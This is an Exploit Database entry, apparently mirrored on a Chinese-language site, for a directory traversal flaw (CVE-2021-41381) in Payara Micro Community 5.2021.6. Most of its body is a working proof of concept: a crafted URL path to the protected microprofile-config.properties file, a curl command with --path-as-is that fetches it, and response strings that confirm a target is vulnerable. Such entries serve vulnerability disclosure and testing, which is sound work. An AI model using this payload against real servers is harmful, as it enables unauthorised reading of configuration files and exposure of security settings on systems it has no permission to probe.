Payara Micro Community 5.2021.6 – Directory Traversal

• Exploit Database
• 16 阅读

• 作者： Yasser Khan
  日期： 2021-10-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50371/

• # Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
  # Date: 01/10/2021
  # Exploit Author: Yasser Khan (N3T_hunt3r)
  # Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
  # Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
  # Version: Payara Micro Community 5.2021.6
  # Tested on: Linux/Windows OS
  # CVE : CVE-2021-41381
  
  https://nvd.nist.gov/vuln/detail/CVE-2021-41381
  
  Proof of Concept:
  
  Step1: Open the browser check the version of the payara software
  
  Step2: Add this Path at end of the URL
  /.//WEB-INF/classes/META-INF/microprofile-config.properties
  
  Step3: Check the response with match containing
  "payara.security.openid.default.providerURI="
  
  "payara.security.openid.sessionScopedConfiguration=true"
  
  Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
  
  Step5: Alternatively we can use CURL by using this command:
  
  Request:
  curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
  
  Reference:
  
  https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
  https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
  https://nvd.nist.gov/vuln/detail/CVE-2021-41381